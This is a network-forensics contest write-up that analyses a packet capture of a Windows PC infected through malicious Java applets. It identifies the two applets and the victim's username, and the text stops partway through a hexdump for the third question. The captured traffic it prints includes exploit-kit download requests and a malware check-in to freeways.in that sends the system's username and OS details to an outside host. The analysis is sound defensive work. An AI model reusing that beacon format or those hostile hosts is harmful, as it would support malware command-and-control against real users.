Name: Christian North

Description:

The first thing I did was validate the MD5 checksum of the infected.pcap file.

hacktop:/home/cnorth/forensics/puzzle5/$ md5sum infected.pcap
c09a3019ada7ab17a44537b069480312  infected.pcap

The checksum matches the hash published on http://forensicscontest.com.

Next I reviewed the pcap file with an IP traffic analyzer I'm developing in my
spare time.

hacktop:/home/cnorth/forensics/puzzle5/$ tracenet -A -f infected.pcap
tracenet> reading packets from infected.pcap
tracenet> detected pcap magic number

Read 303 packets in 0.02 seconds (188538 octets) from infected.pcap
Dropped 0 packets
Discarded 0 packets
Filtered 303 packets - 100.000% (27.2 kbit/s)

Protocol  Details         Packets             Data Transfer        Avg Rate
--------------------------------------------------------------------------------
TCP/80    www               257   84.818%      174 KB   94.570%    26 kbit/s
TCP/443   https              19    6.271%        8 KB    4.084%     1 kbit/s
UDP/53    domain             12    3.960%        1 KB    0.698%   190 bit/s
TCP/444   snpp                9    2.970%       673 B    0.365%    99 bit/s
UDP/137   netbios-ns          6    1.980%       522 B    0.283%    77 bit/s

TCP: 94.059%  UDP: 5.941%  ICMP: 0.000%  ICMP6: 0.000%  ARP: 0.000%  OTHER: 0.000%

We can now see the pcap file contains 303 packets distributed over 5
protocol/port pairs. In order to better understand the HTTP traffic details I
needed to reassemble the TCP streams.
hacktop:/home/cnorth/forensics/puzzle5/$ mkdir streams
hacktop:/home/cnorth/forensics/puzzle5/$ tracenet -f infected.pcap -r streams
hacktop:/home/cnorth/forensics/puzzle5/$ cd streams
hacktop:/home/cnorth/forensics/puzzle5/$ ls -l
-rw-r--r-- 1 cnorth cnorth  2739 2010-04-02 19:07 C0A81781-1061-3B355B66-80
-rw-r--r-- 1 cnorth cnorth  6705 2010-04-02 19:07 C0A81781-1062-4137C3FA-443
-rw-r--r-- 1 cnorth cnorth   832 2010-04-02 19:07 C0A81781-1063-3B355B66-80
-rw-r--r-- 1 cnorth cnorth  7599 2010-04-02 19:07 C0A81781-1064-3B355B66-80
-rw-r--r-- 1 cnorth cnorth  6090 2010-04-02 19:07 C0A81781-1065-3B355B66-80
-rw-r--r-- 1 cnorth cnorth 68581 2010-04-02 19:07 C0A81781-1066-3B355B66-80
-rw-r--r-- 1 cnorth cnorth 68569 2010-04-02 19:07 C0A81781-1067-3B355B66-80
-rw-r--r-- 1 cnorth cnorth   263 2010-04-02 19:07 C0A81781-1068-D59B1D90-444
-rw-r--r-- 1 cnorth cnorth  1137 2010-04-02 19:07 C0A81781-1069-D4FC2014-80

This is the naming convention used for the reassembled TCP stream files:
HEX_SRC_IP-SRC_PORT-HEX_DST_IP-DST_PORT. The output shows that 9 TCP streams
were reassembled:

7 - TCP/80  HTTP
1 - TCP/443 HTTPS
1 - TCP/444 ?

Using grep and hexdump allowed me to find the answer to question #1. Grep was
used to determine which stream files contained the string "jar" and hexdump was
used to confirm these were HTTP GET requests.

hacktop:/home/cnorth/forensics/puzzle5/streams# grep jar *-80
Binary file C0A81781-1064-3B355B66-80 matches
Binary file C0A81781-1065-3B355B66-80 matches

$ hexdump -C C0A81781-1064-3B355B66-80 -n25
00000000  47 45 54 20 2f 73 64 66 67 2e 6a 61 72 20 48 54  |GET /sdfg.jar HT|
00000010  54 50 2f 31 2e 31 0d 0a 61                       |TP/1.1..a|
00000019

$ hexdump -C C0A81781-1065-3B355B66-80 -n25
00000000  47 45 54 20 2f 71 2e 6a 61 72 20 48 54 54 50 2f  |GET /q.jar HTTP/|
00000010  31 2e 31 0d 0a 61 63 63 65                       |1.1..acce|
00000019

===============================================================================
Q1. As part of the infection process, Ms. Moneymany's browser downloaded two
Java applets. What were the names of the two .jar files that implemented
these applets?

A1. sdfg.jar
    q.jar
===============================================================================

Using a bash for loop with hexdump to inspect the HTTP traffic appears to
provide the answer to question #2 in the last stream file.

$ for i in `ls *-80`; do echo $i;hexdump -C -n100 $i; done
C0A81781-1061-3B355B66-80
00000000  47 45 54 20 2f 74 72 75 65 2e 70 68 70 20 48 54  |GET /true.php HT|
00000010  54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20  |TP/1.1..Accept: |
00000020  69 6d 61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65  |image/gif, image|
00000030  2f 6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70  |/jpeg, image/pjp|
00000040  65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65 67 2c  |eg, image/pjpeg,|
00000050  20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73  | application/x-s|
00000060  68 6f 63 6b                                      |hock|
00000064
C0A81781-1063-3B355B66-80
00000000  47 45 54 20 2f 66 61 76 69 63 6f 6e 2e 69 63 6f  |GET /favicon.ico|
00000010  20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70  | HTTP/1.1..Accep|
00000020  74 3a 20 2a 2f 2a 0d 0a 41 63 63 65 70 74 2d 45  |t: */*..Accept-E|
00000030  6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64  |ncoding: gzip, d|
00000040  65 66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65  |eflate..User-Age|
00000050  6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20  |nt: Mozilla/4.0 |
00000060  28 63 6f 6d                                      |(com|
00000064
C0A81781-1064-3B355B66-80
00000000  47 45 54 20 2f 73 64 66 67 2e 6a 61 72 20 48 54  |GET /sdfg.jar HT|
00000010  54 50 2f 31 2e 31 0d 0a 61 63 63 65 70 74 2d 65  |TP/1.1..accept-e|
00000020  6e 63 6f 64 69 6e 67 3a 20 70 61 63 6b 32 30 30  |ncoding: pack200|
00000030  2d 67 7a 69 70 2c 20 67 7a 69 70 0d 0a 63 6f 6e  |-gzip, gzip..con|
00000040  74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69  |tent-type: appli|
00000050  63 61 74 69 6f 6e 2f 78 2d 6a 61 76 61 2d 61 72  |cation/x-java-ar|
00000060  63 68 69 76                                      |chiv|
00000064
C0A81781-1065-3B355B66-80
00000000  47 45 54 20 2f 71 2e 6a 61 72 20 48 54 54 50 2f  |GET /q.jar HTTP/|
00000010  31 2e 31 0d 0a 61 63 63 65 70 74 2d 65 6e 63 6f  |1.1..accept-enco|
00000020  64 69 6e 67 3a 20 70 61 63 6b 32 30 30 2d 67 7a  |ding: pack200-gz|
00000030  69 70 2c 20 67 7a 69 70 0d 0a 63 6f 6e 74 65 6e  |ip, gzip..conten|
00000040  74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74  |t-type: applicat|
00000050  69 6f 6e 2f 78 2d 6a 61 76 61 2d 61 72 63 68 69  |ion/x-java-archi|
00000060  76 65 0d 0a                                      |ve..|
00000064
C0A81781-1066-3B355B66-80
00000000  47 45 54 20 2f 2f 6c 6f 61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61 76 61 64 6e 77 26 4a 30  |p?spl=javadnw&J0|
00000020  35 30 30 30 36 30 31 30 20 48 54 54 50 2f 31 2e  |50006010 HTTP/1.|
00000030  31 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d  |1..User-Agent: M|
00000040  6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 57 69 6e 64  |ozilla/4.0 (Wind|
00000050  6f 77 73 20 58 50 20 35 2e 31 29 20 4a 61 76 61  |ows XP 5.1) Java|
00000060  2f 31 2e 36                                      |/1.6|
00000064
C0A81781-1067-3B355B66-80
00000000  47 45 54 20 2f 2f 6c 6f 61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61 76 61 64 30 20 48 54 54  |p?spl=javad0 HTT|
00000020  50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 67 65 6e  |P/1.1..User-Agen|
00000030  74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28  |t: Mozilla/4.0 (|
00000040  57 69 6e 64 6f 77 73 20 58 50 20 35 2e 31 29 20  |Windows XP 5.1) |
00000050  4a 61 76 61 2f 31 2e 36 2e 30 5f 30 35 0d 0a 48  |Java/1.6.0_05..H|
00000060  6f 73 74 3a                                      |ost:|
00000064
C0A81781-1069-D4FC2014-80
00000000  47 45 54 20 2f 31 31 31 31 31 2f 67 61 74 65 2e  |GET /11111/gate.|
00000010  70 68 70 3f 67 75 69 64 3d 41 44 4d 49 4e 49 53  |php?guid=ADMINIS|
00000020  54 52 41 54 4f 52 21 54 49 43 4b 4c 41 42 53 2d  |TRATOR!TICKLABS-|
00000030  4c 5a 21 31 43 37 41 45 37 43 31 26 76 65 72 3d  |LZ!1C7AE7C1&ver=|
00000040  31 30 30 38 34 26 73 74 61 74 3d 4f 4e 4c 49 4e  |10084&stat=ONLIN|
00000050  45 26 69 65 3d 38 2e 30 2e 36 30 30 31 2e 31 38  |E&ie=8.0.6001.18|
00000060  37 30 32 26                                      |702&|
00000064

A closer look at the connection to 212.252.32.20 (D4FC2014) showed an
interesting HTTP GET request that appears to leak a username. Even though the
server responds with a 404 not found, the server operator would now have the
client's content request details in their web logs... Yikes.

$ tracenet -nx 212.252.32.20 -f infected.pcap
tracenet> filtering ip 212.252.32.20
tracenet> reading packets from infected.pcap
detected pcap magic number

03-16 11:51:05.114322 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 48
IP TOS 0x00 ID 414 DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80
TCP [....S.] SEQ 3322940847 ACK 0 WIN 64240 DATA 0

03-16 11:51:05.392912 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 46
IP TOS 0x00 ID 220 TTL 128 212.252.32.20:80 -> 192.168.23.129:1069
TCP [.A..S.] SEQ 1499272799 ACK 3322940848 WIN 64240 DATA 0

03-16 11:51:05.392944 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 46
IP TOS 0x00 ID 415 DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80
TCP [.A....] SEQ 3322940848 ACK 1499272800 WIN 64240 DATA 0

03-16 11:51:05.397195 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 291
IP TOS 0x00 ID 416 DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80
TCP [.AP...] SEQ 3322940848 ACK 1499272800 WIN 64240 DATA 251
0x0000  47 45 54 20 2F 31 31 31 31 31 2F 67 61 74 65 2E  | GET /11111/gate.
0x0010  70 68 70 3F 67 75 69 64 3D 41 44 4D 49 4E 49 53  | php?guid=ADMINIS
0x0020  54 52 41 54 4F 52 21 54 49 43 4B 4C 41 42 53 2D  | TRATOR!TICKLABS-
0x0030  4C 5A 21 31 43 37 41 45 37 43 31 26 76 65 72 3D  | LZ!1C7AE7C1&ver=
0x0040  31 30 30 38 34 26 73 74 61 74 3D 4F 4E 4C 49 4E  | 10084&stat=ONLIN
0x0050  45 26 69 65 3D 38 2E 30 2E 36 30 30 31 2E 31 38  | E&ie=8.0.6001.18
0x0060  37 30 32 26 6F 73 3D 35 2E 31 2E 32 36 30 30 26  | 702&os=5.1.2600&
0x0070  75 74 3D 41 64 6D 69 6E 26 63 70 75 3D 39 32 26  | ut=Admin&cpu=92&
0x0080  63 63 72 63 3D 35 41 34 46 34 44 46 37 26 6D 64  | ccrc=5A4F4DF7&md
0x0090  35 3D 35 39 34 32 62 61 33 36 63 66 37 33 32 30  | 5=5942ba36cf7320
0x00A0  39 37 34 37 39 63 35 31 39 38 36 65 65 65 39 31  | 97479c51986eee91
0x00B0  65 64 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65  | ed HTTP/1.1..Use
0x00C0  72 2D 41 67 65 6E 74 3A 20 4D 69 63 72 6F 73 6F  | r-Agent: Microso
0x00D0  66 74 20 49 6E 74 65 72 6E 65 74 20 45 78 70 6C  | ft Internet Expl
0x00E0  6F 72 65 72 0D 0A 48 6F 73 74 3A 20 66 72 65 65  | orer..Host: free
0x00F0  77 61 79 73 2E 69 6E 0D 0A 0D 0A                 | ways.in....

03-16 11:51:05.397212 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 46
IP TOS 0x00 ID 221 TTL 128 212.252.32.20:80 -> 192.168.23.129:1069
TCP [.A....] SEQ 1499272800 ACK 3322941099 WIN 64240 DATA 0

03-16 11:51:05.645636 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 926
IP TOS 0x00 ID 222 TTL 128 212.252.32.20:80 -> 192.168.23.129:1069
TCP [.AP...] SEQ 1499272800 ACK 3322941099 WIN 64240 DATA 886
0x0000  48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E 6F 74  | HTTP/1.1 404 Not
0x0010  20 46 6F 75 6E 64 0D 0A 44 61 74 65 3A 20 54 75  |  Found..Date: Tu
0x0020  65 2C 20 31 36 20 4D 61 72 20 32 30 31 30 20 31  | e, 16 Mar 2010 1
0x0030  36 3A 35 31 3A 30 39 20 47 4D 54 0D 0A 53 65 72  | 6:51:09 GMT..Ser
0x0040  76 65 72 3A 20 41 70 61 63 68 65 2F 32 0D 0A 41  | ver: Apache/2..A
0x0050  63 63 65 70 74 2D 52 61 6E 67 65 73 3A 20 62 79  | ccept-Ranges: by
0x0060  74 65 73 0D 0A 56 61 72 79 3A 20 41 63 63 65 70  | tes..Vary: Accep
0x0070  74 2D 45 6E 63 6F 64 69 6E 67 2C 55 73 65 72 2D  | t-Encoding,User-
0x0080  41 67 65 6E 74 0D 0A 54 72 61 6E 73 66 65 72 2D  | Agent..Transfer-
0x0090  45 6E 63 6F 64 69 6E 67 3A 20 63 68 75 6E 6B 65  | Encoding: chunke
0x00A0  64 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A  | d..Content-Type:
0x00B0  20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 39 30  |  text/html....90
0x00C0  0D 0A 3C 21 44 4F 43 54 59 50 45 20 48 54 4D 4C  | ..<!DOCTYPE HTML
0x0110  20 46 6F 75 6E 64 3C 2F 54 49 54 4C 45 3E 0A 3C  |  Found</TITLE>.<
0x0120  2F 48 45 41 44 3E 3C 42 4F 44 59 3E 0A 3C 48 31  | /HEAD><BODY>.<H1
0x0140  54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52  | The requested UR
0x0150  4C 20 0D 0A 66 35 0D 0A 2F 31 31 31 31 31 2F 67  | L ..f5../11111/g
0x0160  61 74 65 2E 70 68 70 3F 67 75 69 64 3D 41 44 4D  | ate.php?guid=ADM
0x0170  49 4E 49 53 54 52 41 54 4F 52 21 54 49 43 4B 4C  | INISTRATOR!TICKL
0x0180  41 42 53 2D 4C 5A 21 31 43 37 41 45 37 43 31 26  | ABS-LZ!1C7AE7C1&
0x0190  61 6D 70 3B 76 65 72 3D 31 30 30 38 34 26 61 6D  | amp;ver=10084&am
0x01A0  70 3B 73 74 61 74 3D 4F 4E 4C 49 4E 45 26 61 6D  | p;stat=ONLINE&am
0x01B0  70 3B 69 65 3D 38 2E 30 2E 36 30 30 31 2E 31 38  | p;ie=8.0.6001.18
0x01C0  37 30 32 26 61 6D 70 3B 6F 73 3D 35 2E 31 2E 32  | 702&amp;os=5.1.2
0x01D0  36 30 30 26 61 6D 70 3B 75 74 3D 41 64 6D 69 6E  | 600&amp;ut=Admin
0x01E0  26 61 6D 70 3B 63 70 75 3D 39 32 26 61 6D 70 3B  | &amp;cpu=92&amp;
0x01F0  63 63 72 63 3D 35 41 34 46 34 44 46 37 26 61 6D  | ccrc=5A4F4DF7&am
0x0200  70 3B 6D 64 35 3D 35 39 34 32 62 61 33 36 63 66  | p;md5=5942ba36cf
0x0210  37 33 32 30 39 37 34 37 39 63 35 31 39 38 36 65  | 732097479c51986e
0x0220  65 65 39 31 65 64 20 77 61 73 20 6E 6F 74 20 66  | ee91ed was not f
0x0230  6F 75 6E 64 20 6F 6E 20 74 68 69 73 20 73 65 72  | ound on this ser
0x0240  76 65 72 2E 0A 3C 48 52 3E 0A 3C 49 3E 0D 0A 31  | ver..<HR>.<I>..1
0x0250  31 62 0D 0A 66 72 65 65 77 61 79 73 2E 69 6E 3C  | 1b..freeways.in<
0x0260  2F 49 3E 0A 3C 2F 42 4F 44 59 3E 3C 2F 48 54 4D  | /I>.</BODY></HTM
0x0280  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0290  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02A0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02B0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02C0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02D0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02E0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02F0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0300  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0310  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0320  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0330  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0340  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0350  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0360  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0D  | ................
0x0370  0A 30 0D 0A 0D 0A                                | .0....

03-16 11:51:05.745725 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 926
IP TOS 0x00 ID 223 TTL 128 212.252.32.20:80 -> 192.168.23.129:1069
TCP [.AP...] SEQ 1499272800 ACK 3322941099 WIN 64240 DATA 886
0x0000  48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E 6F 74  | HTTP/1.1 404 Not
0x0010  20 46 6F 75 6E 64 0D 0A 44 61 74 65 3A 20 54 75  |  Found..Date: Tu
0x0020  65 2C 20 31 36 20 4D 61 72 20 32 30 31 30 20 31  | e, 16 Mar 2010 1
0x0030  36 3A 35 31 3A 30 39 20 47 4D 54 0D 0A 53 65 72  | 6:51:09 GMT..Ser
0x0040  76 65 72 3A 20 41 70 61 63 68 65 2F 32 0D 0A 41  | ver: Apache/2..A
0x0050  63 63 65 70 74 2D 52 61 6E 67 65 73 3A 20 62 79  | ccept-Ranges: by
0x0060  74 65 73 0D 0A 56 61 72 79 3A 20 41 63 63 65 70  | tes..Vary: Accep
0x0070  74 2D 45 6E 63 6F 64 69 6E 67 2C 55 73 65 72 2D  | t-Encoding,User-
0x0080  41 67 65 6E 74 0D 0A 54 72 61 6E 73 66 65 72 2D  | Agent..Transfer-
0x0090  45 6E 63 6F 64 69 6E 67 3A 20 63 68 75 6E 6B 65  | Encoding: chunke
0x00A0  64 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A  | d..Content-Type:
0x00B0  20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 39 30  |  text/html....90
0x00C0  0D 0A 3C 21 44 4F 43 54 59 50 45 20 48 54 4D 4C  | ..<!DOCTYPE HTML
0x0110  20 46 6F 75 6E 64 3C 2F 54 49 54 4C 45 3E 0A 3C  |  Found</TITLE>.<
0x0120  2F 48 45 41 44 3E 3C 42 4F 44 59 3E 0A 3C 48 31  | /HEAD><BODY>.<H1
0x0140  54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52  | The requested UR
0x0150  4C 20 0D 0A 66 35 0D 0A 2F 31 31 31 31 31 2F 67  | L ..f5../11111/g
0x0160  61 74 65 2E 70 68 70 3F 67 75 69 64 3D 41 44 4D  | ate.php?guid=ADM
0x0170  49 4E 49 53 54 52 41 54 4F 52 21 54 49 43 4B 4C  | INISTRATOR!TICKL
0x0180  41 42 53 2D 4C 5A 21 31 43 37 41 45 37 43 31 26  | ABS-LZ!1C7AE7C1&
0x0190  61 6D 70 3B 76 65 72 3D 31 30 30 38 34 26 61 6D  | amp;ver=10084&am
0x01A0  70 3B 73 74 61 74 3D 4F 4E 4C 49 4E 45 26 61 6D  | p;stat=ONLINE&am
0x01B0  70 3B 69 65 3D 38 2E 30 2E 36 30 30 31 2E 31 38  | p;ie=8.0.6001.18
0x01C0  37 30 32 26 61 6D 70 3B 6F 73 3D 35 2E 31 2E 32  | 702&amp;os=5.1.2
0x01D0  36 30 30 26 61 6D 70 3B 75 74 3D 41 64 6D 69 6E  | 600&amp;ut=Admin
0x01E0  26 61 6D 70 3B 63 70 75 3D 39 32 26 61 6D 70 3B  | &amp;cpu=92&amp;
0x01F0  63 63 72 63 3D 35 41 34 46 34 44 46 37 26 61 6D  | ccrc=5A4F4DF7&am
0x0200  70 3B 6D 64 35 3D 35 39 34 32 62 61 33 36 63 66  | p;md5=5942ba36cf
0x0210  37 33 32 30 39 37 34 37 39 63 35 31 39 38 36 65  | 732097479c51986e
0x0220  65 65 39 31 65 64 20 77 61 73 20 6E 6F 74 20 66  | ee91ed was not f
0x0230  6F 75 6E 64 20 6F 6E 20 74 68 69 73 20 73 65 72  | ound on this ser
0x0240  76 65 72 2E 0A 3C 48 52 3E 0A 3C 49 3E 0D 0A 31  | ver..<HR>.<I>..1
0x0250  31 62 0D 0A 66 72 65 65 77 61 79 73 2E 69 6E 3C  | 1b..freeways.in<
0x0260  2F 49 3E 0A 3C 2F 42 4F 44 59 3E 3C 2F 48 54 4D  | /I>.</BODY></HTM
0x0280  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0290  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02A0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02B0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02C0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02D0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02E0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x02F0  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0300  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0310  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0320  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0330  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0340  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0350  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A  | ................
0x0360  0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0D  | ................
0x0370  0A 30 0D 0A 0D 0A                                | .0....

03-16 11:51:05.745747 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 46
IP TOS 0x00 ID 417 DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80
TCP [.A....] SEQ 3322941099 ACK 1499273686 WIN 63354 DATA 0

03-16 11:51:06.059094 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 46
IP TOS 0x00 ID 225 TTL 128 212.252.32.20:80 -> 192.168.23.129:1069
TCP [.AP..F] SEQ 1499273686 ACK 3322941099 WIN 64240 DATA 0

03-16 11:51:06.631106 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 46
IP TOS 0x00 ID 419 DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80
TCP [.A....] SEQ 3322941099 ACK 1499273687 WIN 63354 DATA 0

===============================================================================
Q2.
What was Ms. Moneymany's username on the infected Windows system?

A2. ADMINISTRATOR
===============================================================================

To find the answer to question #3 I needed to review the web content that was
downloaded. After reading RFC 2616 I learned that to extract the content I
needed to identify the encoding type and the content offset within each stream
file. The reassembled HTTP stream files contain both the client's request for
content and the server's response with the content. With that in mind I used
hexdump against the first stream file to identify the client's request for
content, the host it was sent to, the encoding type, and the content offset.

$ hexdump C0A81781-1061-3B355B66-80 -C -n 1000
00000000  47 45 54 20 2f 74 72 75 65 2e 70 68 70 20 48 54  |GET /true.php HT|
00000010  54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20  |TP/1.1..Accept: |
00000020  69 6d 61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65  |image/gif, image|
00000030  2f 6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70  |/jpeg, image/pjp|
00000040  65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65 67 2c  |eg, image/pjpeg,|
00000050  20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73  | application/x-s|
00000060  68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 2c 20  |hockwave-flash, |
00000070  61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73  |application/x-ms|
00000080  2d 61 70 70 6c 69 63 61 74 69 6f 6e 2c 20 61 70  |-application, ap|
00000090  70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 78  |plication/x-ms-x|
000000a0  62 61 70 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e  |bap, application|
000000b0  2f 76 6e 64 2e 6d 73 2d 78 70 73 64 6f 63 75 6d  |/vnd.ms-xpsdocum|
000000c0  65 6e 74 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e  |ent, application|
000000d0  2f 78 61 6d 6c 2b 78 6d 6c 2c 20 2a 2f 2a 0d 0a  |/xaml+xml, */*..|
000000e0  41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a  |Accept-Language:|
000000f0  20 65 6e 2d 75 73 0d 0a 55 73 65 72 2d 41 67 65  | en-us..User-Age|
00000100  6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20  |nt: Mozilla/4.0 |
00000110  28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49  |(compatible; MSI|
00000120  45 20 38 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e  |E 8.0; Windows N|
00000130  54 20 35 2e 31 3b 20 54 72 69 64 65 6e 74 2f 34  |T 5.1; Trident/4|
00000140  2e 30 3b 20 2e 4e 45 54 20 43 4c 52 20 32 2e 30  |.0; .NET CLR 2.0|
00000150  2e 35 30 37 32 37 3b 20 2e 4e 45 54 20 43 4c 52  |.50727; .NET CLR|
00000160  20 33 2e 30 2e 34 35 30 36 2e 32 31 35 32 3b 20  | 3.0.4506.2152; |
00000170  2e 4e 45 54 20 43 4c 52 20 33 2e 35 2e 33 30 37  |.NET CLR 3.5.307|
00000180  32 39 29 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f  |29)..Accept-Enco|
00000190  64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c  |ding: gzip, defl|
000001a0  61 74 65 0d 0a 48 6f 73 74 3a 20 6e 72 74 6a 6f  |ate..Host: nrtjo|
000001b0  2e 65 75 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a  |.eu..Connection:|
000001c0  20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 0d 0a 48  | Keep-Alive....H|
000001d0  54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a  |TTP/1.1 200 OK..|
000001e0  53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44  |Server: nginx..D|
000001f0  61 74 65 3a 20 57 65 64 2c 20 31 37 20 4d 61 72  |ate: Wed, 17 Mar|
00000200  20 32 30 31 30 20 30 30 3a 35 35 3a 33 36 20 47  | 2010 00:55:36 G|
00000210  4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65  |MT..Content-Type|
00000220  3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61  |: text/html; cha|
00000230  72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e  |rset=UTF-8..Tran|
00000240  73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63  |sfer-Encoding: c|
00000250  68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69  |hunked..Connecti|
00000260  6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a  |on: keep-alive..|
00000270  58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48  |X-Powered-By: PH|
00000280  50 2f 35 2e 32 2e 31 31 0d 0a 43 61 63 68 65 2d  |P/5.2.11..Cache-|
